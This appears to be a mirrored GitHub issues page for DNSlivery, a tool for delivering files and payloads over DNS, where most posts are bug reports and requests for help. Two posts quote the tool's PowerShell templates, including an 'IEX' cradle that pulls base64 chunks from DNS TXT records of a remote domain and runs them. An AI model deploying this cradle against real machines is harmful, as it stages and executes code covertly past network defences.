Giter Club home page Giter Club logo

dnslivery's Issues

centos7: dnslivery doesn't listen on UDP port 53

run:

[root@hella DNSlivery]# ./dnslivery.py venet0:0 poc.mydomain.club dnslivery.mydomain.club --verbose -p temp/

DNSlivery - Easy files and payloads delivery over DNS

[*] File "blah.txt" ready for delivery at blah-txt.poc.mydomain.club (1 chunks)
[*] Listening for DNS queries...

netstat:

[root@hella ~]# netstat -anu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
udp        0      0 0.0.0.0:111             0.0.0.0:*

I'm a scapy newb so I'm not totally familiar, but I'd assume some process needs to bind a UDP socket to listen on for sniff() to do anything, correct?

代码132-138请问是什么意思啊 

    launcher_template = 'IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{Resolve-DnsName -ty TXT -na "%s.%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}))))'

    stager_templates = {
        'print': '[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)})))',
        'exec': 'IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)}))))',
        'save': '[IO.File]::WriteAllBytes("$(Get-Location)\%s",[System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)})))',
    }

大佬这几行是什么语言能说下吗,我查什么关键字.... 英语比较差,那个youtube的视频看不懂....

Error Loading

Getting this on launch:
$ sudo python dnslivery.py eth0 -p /tmp/dns-delivery/ -v myevildomain.com ns1.myevildomain.com

DNSlivery - Easy files and payloads delivery over DNS

Traceback (most recent call last):
File "dnslivery.py", line 153, in
if not args.size.isdecimal():
AttributeError: 'str' object has no attribute 'isdecimal'

If I delete all files in /tmp/dns-delivery/ directory, it will launch but obviously not do anything as there's nothing to serve. Is there a format/syntax that the files need to be, as it looks like python is processing them on load and breaks them down into a Base64 chunks. For some reason even a simplest "Hello World" text document prevents it from launching for me.
Thanks!

Recommand to Listen on UDP port 53 

...
# listen for DNS query
    log('Listening for DNS queries...')
    udpserver = socket. socket(socket.AF_INET, socket.SOCK_DGRAM)  
    udpserver.bind(('0.0.0.0',53)) #listen to 53 port

    while True: dns_listener = sniff(filter='udp dst port 53', iface=args.interface, prn=dns_handler)

Recommand to add two line in the code to listen to udp port 53 .Because if we don't listen 53 port ,the kernel will always reply a "Destination Unreachable" packet to the client which will cause data transfering not stable.
icmp

what dose code between 132-138 means? 

 launcher_template = 'IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{Resolve-DnsName -ty TXT -na "%s.%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}))))'

    stager_templates = {
        'print': '[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)})))',
        'exec': 'IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)}))))',
        'save': '[IO.File]::WriteAllBytes("$(Get-Location)\%s",[System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)})))',
    }

I am poor at English, C# , powershell.
I tried to search on google, but i even don't know which keywords to use. Could you please tell me is "[System.Text.Encoding]" C# or powershell syntax, and what does it mean...

thanks you very much.

error msg 

➜  DNSlivery git:(master) ✗ python3.6 dnslivery.py eth0 dnsd.fuy.com vps.fuy.com

DNSlivery - Easy files and payloads delivery over DNS

[*] File "nidaye" ready for delivery at nidaye.dnsd.fuy.com (1 chunks)
[*] File "requirements.txt" ready for delivery at requirements-txt.dnsd.fuy.com (1 chunks)
[*] File "dnslivery.py" ready for delivery at dnslivery-py.dnsd.fuy.com (46 chunks)
[*] File "LICENSE" ready for delivery at license.dnsd.fuy.com (6 chunks)
[*] File "README.md" ready for delivery at readme-md.dnsd.fuy.com (38 chunks)
[*] File ".gitignore" ready for delivery at -gitignore.dnsd.fuy.com (1 chunks)
[*] Listening for DNS queries...

match existing file!
[+] Delivering nidaye print launcher to 58.217.249.133
Traceback (most recent call last):
  File "/usr/local/lib/python3.6/site-packages/scapy/compat.py", line 117, in raw
    return bytes(x)
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 441, in __bytes__
    return self.build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 556, in build
    p = self.do_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 538, in do_build
    pkt = self.self_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 519, in self_build
    p = f.addfield(self, p, val)
  File "/usr/local/lib/python3.6/site-packages/scapy/fields.py", line 134, in addfield
    return s + struct.pack(self.fmt, self.i2m(pkt, val))
  File "/usr/local/lib/python3.6/site-packages/scapy/layers/dns.py", line 371, in i2m
    x = len(rdataf.i2m(pkt, pkt.rdata))
  File "/usr/local/lib/python3.6/site-packages/scapy/layers/dns.py", line 351, in i2m
    while len(text) >= 255:
TypeError: object of type 'int' has no len()

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.6/site-packages/scapy/compat.py", line 117, in raw
    return bytes(x)
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 441, in __bytes__
    return self.build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 556, in build
    p = self.do_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 541, in do_build
    pay = self.do_build_payload()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 528, in do_build_payload
    return self.payload.do_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 541, in do_build
    pay = self.do_build_payload()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 528, in do_build_payload
    return self.payload.do_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 541, in do_build
    pay = self.do_build_payload()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 528, in do_build_payload
    return self.payload.do_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 538, in do_build
    pkt = self.self_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 519, in self_build
    p = f.addfield(self, p, val)
  File "/usr/local/lib/python3.6/site-packages/scapy/fields.py", line 905, in addfield
    return s + self.i2m(pkt, val)
  File "/usr/local/lib/python3.6/site-packages/scapy/layers/dns.py", line 255, in i2m
    return raw(x)
  File "/usr/local/lib/python3.6/site-packages/scapy/compat.py", line 119, in raw
    return bytes(x, encoding="utf8")
TypeError: encoding without a string argument

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "dnslivery.py", line 184, in <module>
    while True: dns_listener = sniff(filter='udp dst port 53', iface=args.interface, prn=dns_handler)
  File "/usr/local/lib/python3.6/site-packages/scapy/sendrecv.py", line 886, in sniff
    r = prn(p)
  File "dnslivery.py", line 97, in dns_handler
    send(response_pkt, verbose=0, iface=args.interface)
  File "/usr/local/lib/python3.6/site-packages/scapy/sendrecv.py", line 314, in send
    realtime=realtime, return_packets=return_packets)
  File "/usr/local/lib/python3.6/site-packages/scapy/sendrecv.py", line 287, in __gen_send
    s.send(p)
  File "/usr/local/lib/python3.6/site-packages/scapy/arch/linux.py", line 533, in send
    sx = raw(ll(x))
  File "/usr/local/lib/python3.6/site-packages/scapy/compat.py", line 119, in raw
    return bytes(x, encoding="utf8")
TypeError: encoding without a string argument

file content:

➜  DNSlivery git:(master) ✗ cat nidaye 
zheshizenmehuishi?

win7 or win2008 can't work

It errors in win7 or win2008.
无法将“Resolve-DnsName”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。请
检查名称的拼写,如果包括路径,请确保路径正确,然后重试。
https://xbuba.com/questions/51423281
Please, is there any resolution?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.